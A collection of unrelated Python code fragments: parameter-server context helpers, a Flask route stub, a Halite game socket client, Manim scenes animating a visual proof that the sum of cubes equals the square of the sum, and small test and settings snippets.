Returns attribute value according to the key.
Raises:
ValueError: If input key is not attribute in auto parallel context.
"""
if attr_key not in _get_ps_context_func_map:
raise ValueError("Get PS context keyword %s is not recognized!" % attr_key)
get_func = _get_ps_context_func_map[attr_key]
value = get_func()
return value
def _reset_ps_context():
"""
Reset parameter server training mode context attributes to the default values:
- enable_ps: False.
"""
ps_context().reset()
def _is_role_worker():
return ps_context().is_worker()
def _is_role_pserver():
return ps_context().is_server()
def _is_role_sched():
return ps_context().is_scheduler()
def _insert_hash_table_size(name, cache_vocab_size, embedding_size, vocab_size):
ps_context().insert_hash_table_size(name, cache_vocab_size, embedding_size, vocab_size)
def _reinsert_hash_table_size(new_name, cur_name, cache_vocab_size, embedding_size):
ps_context().reinsert_hash_table_size(new_name, cur_name, cache_vocab_size, embedding_size)
def _insert_weight_init_info(name, global_seed, op_seed):
ps_context().insert_weight_init_info(name, global_seed, op_seed)
def _insert_accumu_init_info(name, init_val):
ps_context().insert_accumu_init_info(name, init_val)
def _clone_hash_table(dest_param_name, src_param_name):
ps_context().clone_hash_table(dest_param_name, src_param_name)
def _set_cache_enable(cache_enable):
# Environment variables are used to specify a maximum number of OpenBLAS threads:
# In ubuntu(GPU) environment, numpy will use too many threads for computing,
if cache_enable:
os.environ['OPENBLAS_NUM_THREADS'] = '2'
os.environ['GOTO_NUM_THREADS'] = '2'
os.environ['OMP_NUM_THREADS'] = '2'
ps_context().set_cache_enable(cache_enable)
def _set_rank_id(rank_id):
ps_context().set_rank_id(rank_id)
def _is_ps_mode():
return _get_ps_context("server_mode") == "PARAMETER_SERVER"
def _is_fl_mode():
return _get_ps_context("server_mode") in ("FEDERATED_LEARNING", "HYBRID_TRAINING")
def _check_value(key, value):
"""
Validate the value for parameter server context keys.
"""
if key in _check_positive_int_keys:
Validator.check_positive_int(value, key)
if key in _check_non_negative_int_keys:
Validator.check_non_negative_int(value, key)
if key in _check_positive_float_keys:
Validator.check_positive_float(value, key)
if key in _check_port_keys:
if value < 1 or value > 65535:
raise ValueError("The range of %s must be 1 to 65535, but got %d." % (key, value))
|
nilq/baby-python
|
python
|
from ..classes import ml_util
def test_objective_function():
new_objective = ml_util.ObjectiveFunction()
new_objective.load_data(path="Use Cases/VPS Popcorn Production/Docker/src/data/vpsFeatures.csv")
new_objective.fit_model()
prediction = new_objective.get_objective(4000)
assert prediction == 0.6553353728953759
|
nilq/baby-python
|
python
|
AddressType = int
SelectorType = int
|
nilq/baby-python
|
python
|
from manimlib.imports import *
from my_manim_projects.my_utils.my_3D_mobject import *
from my_manim_projects.my_utils.my_text import *
class Sum_of_cubes(ThreeDScene):
CONFIG = {
'camera_init': {
'phi': 52.5 * DEGREES,
'gamma': 0,
'theta': -45 * DEGREES,
},
'camera_config': {
'should_apply_shading': False
},
}
def construct(self):
self.set_camera_orientation(**self.camera_init)
color_list = [[GREEN_E, MAROON, GREEN_A, TEAL_D],
[MAROON, BLUE_D, GOLD_D, PURPLE_A],
[GREEN_A, GOLD_D, RED, YELLOW_D],
[TEAL_D, PURPLE_A, YELLOW_D, PINK]]
shift_list = [0, 1.5, 1.5 + 2.5, 1.5 + 2.5 + 3.5]
size = 0.5
cube_config = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.85,
'stroke_color': WHITE,
'stroke_width': 1.2,
}
cube_config_02 = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.2,
'stroke_color': WHITE,
'stroke_width': 0.6,
}
group_all = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config)\
.outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size)
group_all.add(rect_ij)
s = 1.0
square_01 = self.l_shape_mn((1, 1), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
square_02 = self.l_shape_mn((3, 3), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
square_03 = self.l_shape_mn((6., 6.), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
square_04 = self.rect_mn_2d((10., 10.), 4, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
group_square = VGroup(square_01, square_02, square_03, square_04)
group_all_02 = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config_02)\
.outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size * (1 + s))
group_all_02.add(rect_ij)
group_all.shift((LEFT + DOWN) * 4 + (LEFT + UP) * 0.8).shift(np.array([0, 0, 1.2]))
group_square.shift((LEFT + DOWN) * 4 + (LEFT + UP) * 0.8 + np.array([0, 0, -0.25]))
group_all_02.shift((LEFT + DOWN) * 4 + (LEFT + UP) * 0.8)
group_01, group_02, group_03, group_04 = VGroup(), VGroup(), VGroup(), VGroup()
group_01.add(group_all_02[12])
group_02.add(group_all_02[8], group_all_02[9], group_all_02[13])
group_03.add(group_all_02[4], group_all_02[5], group_all_02[6], group_all_02[10], group_all_02[14])
group_04.add(group_all_02[0], group_all_02[1], group_all_02[2], group_all_02[3], group_all_02[7], group_all_02[11], group_all_02[15])
for i in range(16):
self.play(FadeIn(group_all[i]), run_time=0.15)
self.play(ApplyMethod(group_all[i].shift, np.array([0, 0, -1.2])), run_time=0.45)
self.wait(0.1)
self.wait(2)
self.play(ApplyMethod(group_all.scale, 0.8))
self.wait()
self.add(group_square)
self.play(ReplacementTransform(group_all, group_all_02), run_time=1.75)
self.wait(2.)
opac = 0.15
### 2 ** 2 anim
a = group_02[0].copy()
self.add(a)
group_02[0].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.5)
self.play(ApplyMethod(a.shift, RIGHT * (1.5 + s * 1) * size), run_time=0.9)
self.wait(0.8)
a = group_02[2].copy()
self.add(a)
group_02[2].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 0.5 * size), run_time=0.2)
self.play(ApplyMethod(a.shift, UP * (2 + s * 1) * size), run_time=0.8)
self.wait(1.2)
### 3 ** 3 anim
# move right
a = group_03[1].copy()
self.add(a)
group_03[1].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(ApplyMethod(a.shift, RIGHT * (2.5 + s * 2) * size), run_time=1.)
self.wait(0.8)
a = group_03[0].copy()
self.add(a)
group_03[0].set_fill(color_list[0][2], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(ApplyMethod(a.shift, RIGHT * (4 + s * 3) * size), run_time=1.2)
self.wait(0.8)
# move up
a = group_03[4].copy()
self.add(a)
group_03[4].set_fill(color_list[2][0], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 1 * size), run_time=0.3)
self.play(ApplyMethod(a.shift, UP * (5. + s * 3) * size), run_time=1.5)
self.wait(0.8)
a = group_03[3].copy()
self.add(a)
group_03[3].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 0.5 * size), run_time=0.2)
self.play(ApplyMethod(a.shift, UP * (3 + s * 2) * size), run_time=1.)
self.wait(1.2)
### 4 ** 4 anim
# move right
a = group_04[2].copy()
self.add(a)
group_04[2].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(ApplyMethod(a.shift, RIGHT * (3.5 + s * 3) * size), run_time=1.)
self.wait(0.8)
a = group_04[1].copy()
self.add(a)
group_04[1].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(ApplyMethod(a.shift, RIGHT * (6 + s * 5) * size), run_time=1.6)
self.wait(0.8)
a = group_04[0].copy()
self.add(a)
group_04[0].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 3]) * size), run_time=0.9)
self.play(ApplyMethod(a.shift, RIGHT * (7.5 + s * 6) * size), run_time=1.8)
self.wait(0.8)
# move up
a = group_04[6].copy()
self.add(a)
group_04[6].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, OUT * size), run_time=0.64)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 1.5 * size), run_time=0.36)
self.play(ApplyMethod(a.shift, UP * (9 + s * 6) * size), run_time=2.2)
self.wait(0.8)
a = group_04[5].copy()
self.add(a)
group_04[5].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 2]) * size), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 1 * size), run_time=0.3)
self.play(ApplyMethod(a.shift, UP * (6 + s * 6) * size), run_time=2.)
self.wait(0.8)
a = group_04[4].copy()
self.add(a)
group_04[4].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, np.array([0, 0, 3]) * size), run_time=0.9)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(ApplyMethod(a.shift, RIGHT * 0.5 * size), run_time=0.2)
self.play(ApplyMethod(a.shift, UP * (3.5 + s * 3.5) * size), run_time=1.8)
self.wait(4)
def l_shape_mn(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
l01 = Line(p[1], p[2], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
l02 = Line(p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return VGroup(l01, l02)
def rect_mn_2d(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
rect_mn = Polygon(p[0], p[1], p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return rect_mn
class Sum_of_cubes_new(ThreeDScene):
CONFIG = {
'camera_init': {
'phi': 52.5 * DEGREES,
'gamma': 0,
'theta': -45 * DEGREES,
},
'camera_config': {
'should_apply_shading': False
},
}
def construct(self):
self.set_camera_orientation(**self.camera_init)
color_list = [[GREEN_E, MAROON, GREEN_A, TEAL_D],
[MAROON, BLUE_D, GOLD_D, PURPLE_A],
[GREEN_A, GOLD_D, RED, YELLOW_D],
[TEAL_D, PURPLE_A, YELLOW_D, PINK]]
shift_list = [0, 1.5, 1.5 + 2.5, 1.5 + 2.5 + 3.5]
size = 0.5
cube_config = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.85,
'stroke_color': WHITE,
'stroke_width': 1.2,
}
cube_config_02 = {
# 'reset_color': False,
'cube_size': size,
'gap': 0,
'fill_opacity': 0.2,
'stroke_color': WHITE,
'stroke_width': 0.6,
}
group_all = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config)\
.outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size)
group_all.add(rect_ij)
s = 0.98
# square_01 = self.l_shape_mn((1, 1), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# square_02 = self.l_shape_mn((3, 3), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# square_03 = self.l_shape_mn((6., 6.), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# square_04 = self.rect_mn_2d((10., 10.), 4, scale_factor=0.9, color=LIGHT_GREY, stroke_opacity=1).set_shade_in_3d()
# group_square = VGroup(square_01, square_02, square_03, square_04).set_shade_in_3d()
s02 = 1.1
group_all_02 = VGroup()
for j in range(4):
for i in range(4):
rect_ij = Cube_array(resolution=(4 - j, i + 1, 1), fill_color=color_list[4 - 1 - j][i], **cube_config_02)\
.scale(s02).outer_faces.shift((shift_list[4 - 1 - j] * UP + shift_list[i] * RIGHT) * size * (1 + s))
group_all_02.add(rect_ij)
group_all.shift((LEFT + DOWN) * 2.25 + (LEFT + UP) * 0.8).shift(np.array([0, 0, 1.2])).scale(1.5)
# group_square.shift((LEFT + DOWN) * 3.5 + (LEFT + UP) * 0.8 + np.array([0, 0, -0.25]))
group_all_02.shift((LEFT + DOWN) * 4. + (LEFT + UP) * 0.8)
group_01, group_02, group_03, group_04 = VGroup(), VGroup(), VGroup(), VGroup()
group_01.add(group_all_02[12])
group_02.add(group_all_02[8], group_all_02[9], group_all_02[13])
group_03.add(group_all_02[4], group_all_02[5], group_all_02[6], group_all_02[10], group_all_02[14])
group_04.add(group_all_02[0], group_all_02[1], group_all_02[2], group_all_02[3], group_all_02[7], group_all_02[11], group_all_02[15])
for i in range(16):
self.play(FadeIn(group_all[i]), run_time=0.12)
self.play(ApplyMethod(group_all[i].shift, np.array([0, 0, -1.2])), run_time=0.3)
self.wait(0.08)
self.wait(0.5)
brace_01 = Brace(group_all, DOWN)
tex_01 = brace_01.get_tex('1+2+\\cdots+n')
brace_02 = Brace(group_all, RIGHT)
tex_02 = brace_02.get_tex('1+2+\\cdots+n').rotate(PI/2).next_to(brace_02, RIGHT * 0.5)
tex_group = VGroup(brace_01, brace_02, tex_01, tex_02).align_to(group_all, IN)
self.play(FadeIn(tex_group), run_time=1.5)
self.wait(0.25)
color_dict = {'^2': BLUE, '^3': PINK, '+': ORANGE, '(': RED, ')': RED}
tex_sum_01 = MyText('(', '1', '+', '2', '+', '\\cdots', '+', 'n', ')', '^2', default_font='华光粗圆_CNKI').set_height(1.25).shift(UP * 1)
tex_sum_01.set_color_by_tex_to_color_map(color_dict)
bg_01 = SurroundingRectangle(tex_sum_01, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
replace_dict = {'1': '1', '2': '2', '^2': '2', 'n': 'n', '+': ' + ', '\\cdots': '...'}
tex_sum_new_01 = tex_sum_01.get_new_font_texs(replace_dict)
t_01 = VGroup(bg_01.scale(1.1), tex_sum_new_01,)
self.add_fixed_in_frame_mobjects(t_01)
self.play(FadeIn(bg_01), Write(tex_sum_new_01), run_time=2.)
self.wait(2)
self.play(FadeOut(tex_group), FadeOut(t_01), run_time=1.2)
# self.play(ApplyMethod(group_all.scale, 0.8), run_time=0.8)
self.wait(0.3)
self.play(ReplacementTransform(group_all, group_all_02.scale(1.25)), run_time=1.5)
self.wait(1.)
self.play(group_all_02.scale, 1/1.25, run_time=1.5)
self.wait(0.5)
opac = 0.15
### 2 ** 2 anim
a = group_02[0].copy()
self.add(a)
group_02[0].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(a.align_to, group_02[1], LEFT, run_time=0.6)
self.wait(0.8)
a = group_02[2].copy()
self.add(a)
group_02[2].set_fill(color_list[0][1], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_02[1], RIGHT, run_time=0.25)
self.play(a.align_to, group_02[1], UP, run_time=0.8)
self.wait(1.)
### 3 ** 3 anim
# move right
a = group_03[1].copy()
self.add(a)
group_03[1].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(a.align_to, group_03[2], LEFT, run_time=1)
self.wait(0.8)
a = group_03[0].copy()
self.add(a)
group_03[0].set_fill(color_list[0][2], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(a.align_to, group_03[2], LEFT, run_time=1.2)
self.wait(0.8)
# move up
a = group_03[4].copy()
self.add(a)
group_03[4].set_fill(color_list[2][0], opac)
self.play(ApplyMethod(a.shift, OUT * size* s02), run_time=0.6)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_03[2], RIGHT, run_time=0.3)
self.play(a.align_to, group_03[2], UP, run_time=1.4)
self.wait(0.8)
a = group_03[3].copy()
self.add(a)
group_03[3].set_fill(color_list[2][1], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_03[2], RIGHT, run_time=0.25)
self.play(a.align_to, group_03[2], UP, run_time=1.)
self.wait(1.)
### 4 ** 4 anim
# move right
a = group_04[2].copy()
self.add(a)
group_04[2].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(a.align_to, group_04[3], LEFT, run_time=0.9)
self.wait(0.8)
a = group_04[1].copy()
self.add(a)
group_04[1].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(a.align_to, group_04[3], LEFT, run_time=1.25)
self.wait(0.8)
a = group_04[0].copy()
self.add(a)
group_04[0].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, 3 * OUT * size * s02), run_time=0.9)
self.play(a.align_to, group_04[3], LEFT, run_time=1.75)
self.wait(0.8)
# move up
a = group_04[6].copy()
self.add(a)
group_04[6].set_fill(color_list[3][0], opac)
self.play(ApplyMethod(a.shift, OUT * size * s02), run_time=0.6)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_04[3], RIGHT, run_time=0.35)
self.play(a.align_to, group_04[3], UP, run_time=2)
self.wait(0.8)
a = group_04[5].copy()
self.add(a)
group_04[5].set_fill(color_list[3][1], opac)
self.play(ApplyMethod(a.shift, 2 * OUT * size * s02), run_time=0.8)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_04[3], RIGHT, run_time=0.3)
self.play(a.align_to, group_04[3], UP, run_time=1.8)
self.wait(0.8)
a = group_04[4].copy()
self.add(a)
group_04[4].set_fill(color_list[3][2], opac)
self.play(ApplyMethod(a.shift, 3 * OUT * size * s02), run_time=0.9)
self.play(Rotating(a, radians=PI/2, run_time=1.25))
self.wait(0.1)
self.play(a.align_to, group_04[3], RIGHT, run_time=0.25)
self.play(a.align_to, group_04[3], UP, run_time=1.6)
self.wait()
tex_sum_02 = MyText('1', '^3', '+', '2', '^3', '+', '\\cdots', '+', 'n', '^3', default_font='华光粗圆_CNKI').set_height(1.25).shift(DOWN * 1.25)
tex_sum_02.set_color_by_tex_to_color_map(color_dict)
replace_dict = {'1': '1', '2': '2', '^3': '3', 'n': 'n', '+': ' + ', '\\cdots': '...'}
bg_02 = SurroundingRectangle(tex_sum_02, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
tex_sum_new_02 = tex_sum_02.get_new_font_texs(replace_dict)
t_02 = VGroup(bg_02.scale(1.1), tex_sum_new_02,)
self.add_fixed_in_frame_mobjects(t_02)
self.play(FadeIn(bg_02), Write(tex_sum_new_02), run_time=2)
self.wait(2)
self.play(FadeOut(VGroup(*self.mobjects)), run_time=1.8)
self.wait(0.5)
# self.play(FadeIn(t_01.shift(UP)), FadeIn(t_02.shift(DOWN * 0.5)), run_time=1)
# self.wait(0.4)
#
# equation = MyText('\\sum', '_{i=1}', '^n', 'i', '^3', '\\quad=\\quad', '(', '\\sum', '_{i=1}', '^n', 'i', ')', '^2', default_font='华光粗圆_CNKI').set_height(1.5)
# replace_dict = {'1': '1', '2': '2', '^3': '3', '^n': 'n', '^2': '2', '\\quad=\\quad': ' = ', '_{i=1}': 'i=1',
# '\\sum': '∑', '(': '(', ')': ')'}
# equ = equation.get_new_font_texs(replace_dict)
# self.add_fixed_in_frame_mobjects(equ)
#
# self.play(Write(equ[5]))
# self.wait(0.4)
# self.play(ReplacementTransform(t_02, equ[0:5]), run_time=1.2)
# self.wait(0.5)
# self.play(ReplacementTransform(t_01, equ[6:]), run_time=1.2)
#
# self.wait(4)
def l_shape_mn(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
l01 = Line(p[1], p[2], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
l02 = Line(p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return VGroup(l01, l02)
def rect_mn_2d(self, mn, stroke_scale, scale_factor=1, **kwargs):
m, n = mn[0], mn[1]
p = np.array([[-1, -1, 0], [2 * n - 1, -1, 0], [2 * n - 1, 2 * m - 1, 0], [-1, 2 * m - 1, 0]]) * 0.5
rect_mn = Polygon(p[0], p[1], p[2], p[3], stroke_width=1 * stroke_scale, **kwargs).scale_about_point(scale_factor, ORIGIN)
return rect_mn
class Equation_2d(Scene):
def construct(self):
color_dict = {'^2': BLUE, '^3': PINK, '+': ORANGE, '(': RED, ')': RED}
tex_sum_01 = MyText('(', '1', '+', '2', '+', '\\cdots', '+', 'n', ')', '^2', default_font='华光粗圆_CNKI').set_height(1.25).shift(UP * 1)
tex_sum_01.set_color_by_tex_to_color_map(color_dict)
bg_01 = SurroundingRectangle(tex_sum_01, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
replace_dict = {'1': '1', '2': '2', '^2': '2', 'n': 'n', '+': ' + ', '\\cdots': '...'}
tex_sum_new_01 = tex_sum_01.get_new_font_texs(replace_dict)
t_01 = VGroup(bg_01.scale(1.1), tex_sum_new_01,)
tex_sum_02 = MyText('1', '^3', '+', '2', '^3', '+', '\\cdots', '+', 'n', '^3', default_font='华光粗圆_CNKI').set_height(1.25).shift(DOWN * 1.25)
tex_sum_02.set_color_by_tex_to_color_map(color_dict)
replace_dict = {'1': '1', '2': '2', '^3': '3', 'n': 'n', '+': ' + ', '\\cdots': '...'}
bg_02 = SurroundingRectangle(tex_sum_02, stroke_color=YELLOW, fill_color=BLACK, fill_opacity=0.8, plot_depth=-1)
tex_sum_new_02 = tex_sum_02.get_new_font_texs(replace_dict)
t_02 = VGroup(bg_02.scale(1.1), tex_sum_new_02,)
equation = MyText('\\sum', '^n', '_{i=1}', 'i', '^3', '=', '(', '\\sum', '^n', '_{i=1}', 'i', ')', '^2',
default_font='华光粗圆_CNKI', color=WHITE).set_height(2.2)
equation.set_color_by_tex_to_color_map({
'\\sum': RED,
# # '^{n}': RED,
'_{i=1}': YELLOW,
'i':YELLOW,
'^3': PINK,
'^2': BLUE,
})
replace_dict = {'^3': '3', '^n': '∑', '^2': '2', '=': '=', '_{i=1}': 'i=1',
'\\sum': 'n', '(': '(', ')': ')'}
equ = equation.get_new_font_texs(replace_dict)
gou = TexMobject('\\checkmark', color=GREEN).set_height(1.8).next_to(equ, RIGHT * 1.75)
self.play(FadeIn(t_01.shift(UP)), FadeIn(t_02.shift(DOWN * 0.5)), run_time=1.6)
self.wait(0.4)
self.play(Write(equ[5]))
self.wait(0.4)
self.play(ReplacementTransform(t_02, equ[0:5]), run_time=1.6)
self.wait(0.5)
self.play(ReplacementTransform(t_01, equ[6:]), run_time=1.6)
self.wait(0.25)
self.play(ShowCreationThenFadeAround(SurroundingRectangle(equ).scale(1.05)), run_time=1.5)
self.wait(0.2)
self.play(Write(gou), run_time=1.5)
self.wait(3)
from others.some_anim_effect import *
class Sum_of_cubes_Intro(Scene):
def construct(self):
font = '华光粗圆_CNKI'
color_dict = {'^3': PINK, '^2': BLUE, '+': ORANGE}
replace_dict = {'1': '1', '2': '2', '3': '3', '=': '=', '^3': '3', '^2': '2', '9': '9', '36': '36', 'n': 'n', '\\cdots': '...'}
line_01 = MyText('1', '^3', '=', '1', '=', '1', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
line_02 = MyText('1', '^3', '+', '2', '^3', '=', '9', '=', '(', '1', '+', '2', ')', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
line_03 = MyText('1', '^3', '+', '2', '^3', '+', '3', '^3', '=', '36', '=', '(', '1', '+', '2', '+', '3', ')', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
line_n = MyText('1', '^3', '+', '2', '^3', '+', '\\cdots', '+', 'n', '^3', '=', '(', '1', '+', '2', '+', '\\cdots', '+', 'n', ')', '^2', default_font=font).set_color_by_tex_to_color_map(color_dict)
dots = Text('...', font=font).rotate(PI/2).to_edge(UP * 10.2)
text = Text('经过观察不难发现如下规律:', font='庞门正道标题体').set_height(0.42).to_corner(UP * 1. + LEFT * 1.5)
text_01 = line_01.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 2.5)
text_02 = line_02.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 5)
text_03 = line_03.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 7.5)
text_n = line_n.get_new_font_texs(replace_dict).scale(1.5).to_edge(UP * 12.5)
text_02.shift(RIGHT * (text_01[2].get_center()[0] - text_02[5].get_center()[0]))
text_03.shift(RIGHT * (text_01[2].get_center()[0] - text_03[8].get_center()[0]))
text_03[6].set_color(WHITE), text_03[-3].set_color(WHITE)
self.play(FadeInRandom(text), run_time=1.6)
self.wait(0.4)
self.play(Write(text_01[0:4]), run_time=0.9)
self.play(Write(text_02[0:7]), run_time=1.2)
self.play(Write(text_03[0:10]), run_time=1.5)
self.wait(0.5)
self.play(Write(text_01[4:]), Write(text_02[7:]), Write(text_03[10:]), run_time=1.8)
self.wait(1.5)
self.play(Write(dots), run_time=1.4)
self.wait(0.6)
self.play(WriteRandom(text_n), run_time=2.5)
self.wait(1.8)
self.play(FadeOutAndShift(VGroup(text, text_01, text_02, text_03, dots), UP), text_n.move_to, UP, run_time=1.8)
text_how = Text('如何证明该结论呢?', font='庞门正道标题体').set_height(0.75).next_to(text_n, DOWN * 1.6)
text_7method = Text('我们将介绍七种可视化证明方法', font='庞门正道标题体').set_height(0.65).next_to(text_n, DOWN * 1.64)
text_7method.set_color_by_t2c({'七种': BLUE, '可视化证明': PINK})
self.wait(0.6)
self.play(Write(text_how), run_time=2.2)
self.wait(1.5)
self.play(ReplacementTransform(text_how, text_7method), run_time=1.8)
self.wait(3.)
self.play(UnWriteRandom(text_7method), UnWriteRandom(text_n), run_time=1.2)
self.wait(0.25)
|
nilq/baby-python
|
python
|
# import unittest
# from unittest.mock import patch
# import http.client
|
nilq/baby-python
|
python
|
from app import app
import dataquery
import json
@app.route("/ajaxreq/get_capital_account_info<any:args>",methods=['GET'])
def ajaxrep_get_capital_account_info(args):
#cai=dataquery.get_capital_account_info();
return "abc";
#return json.dumps(cai);
|
nilq/baby-python
|
python
|
import socket
import sys
import hlt
PORT_ = 2000
class Game(hlt.Game):
def __init__(self, *args, **kwargs):
self._buf = []
self._connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._connection.connect(("localhost", PORT_))
super().__init__(*args, **kwargs)
def _send_string(self, s):
"""
Send data to the game. Call :function:`done_sending` once finished.
:param str s: String to send
:return: nothing
"""
self._buf.append(s)
def _done_sending(self):
"""
Finish sending commands to the game.
:return: nothing
"""
self._connection.sendall((''.join(self._buf) + "\n").encode("ascii"))
self._buf.clear()
def _get_string(self):
"""
Read input from the game.
:return: The input read from the Halite engine
:rtype: str
"""
buf = []
while True:
c = self._connection.recv(1024).decode("ascii")
if c == "\n" or not c:
break
else:
buf.append(c)
if not c:
sys.exit()
return "".join(buf)
def send_command_queue(self, command_queue):
"""
Issue the given list of commands.
:param list[str] command_queue: List of commands to send the Halite engine
:return: nothing
"""
for command in command_queue:
self._send_string(command)
self._done_sending()
|
nilq/baby-python
|
python
|
from typing import Iterable, List
import sparql_queries
from movie import Movie
from joblib import Parallel, delayed
from env import env
class Recommandation():
def __init__(self, uri, func, id, text) -> None:
self.data = getattr(sparql_queries, func)(uri)
self.data = [Movie(dataReco=mov) for mov in self.data]
self.id = id
self.text = text
class Recommandations():
def __init__(self, movie) -> None:
self.recommandations = Parallel(n_jobs=-1)(delayed(Recommandation)(movie.uri, func, func, text)
for func, text in zip(env.recommandation_functions, env.recommendation_categories))
|
nilq/baby-python
|
python
|
import unittest
from blazeweb.globals import settings
from blazeweb.config import QuickSettings, EnabledSettings
from blazeweb.hierarchy import listapps
from nose.tools import eq_
from minimal2.application import make_wsgi as make_wsgi_min2
from blazewebtestapp.applications import make_wsgi
class Base(QuickSettings):
def __init__(self):
QuickSettings.__init__(self)
# name of the website/application
self.name.full = 'full'
self.name.short = 'short'
# application modules from our application or supporting applications
self.modules = EnabledSettings()
self.modules.users.enabled = True
self.modules.users.var2 = 'not bar'
self.modules.users.routes = []
self.modules.users.level2.var2 = 'not bar'
self.modules.users.level3 = 'string value to merge'
self.modules.users.level4 = (('var2', 'not bar'), ('var3', 'baz'))
self.modules.users.level5.level1.var1.notlikely = 'foo'
self.modules.users.level5.level2.var1 = 'not_bar'
self.modules.apputil.enabled = True
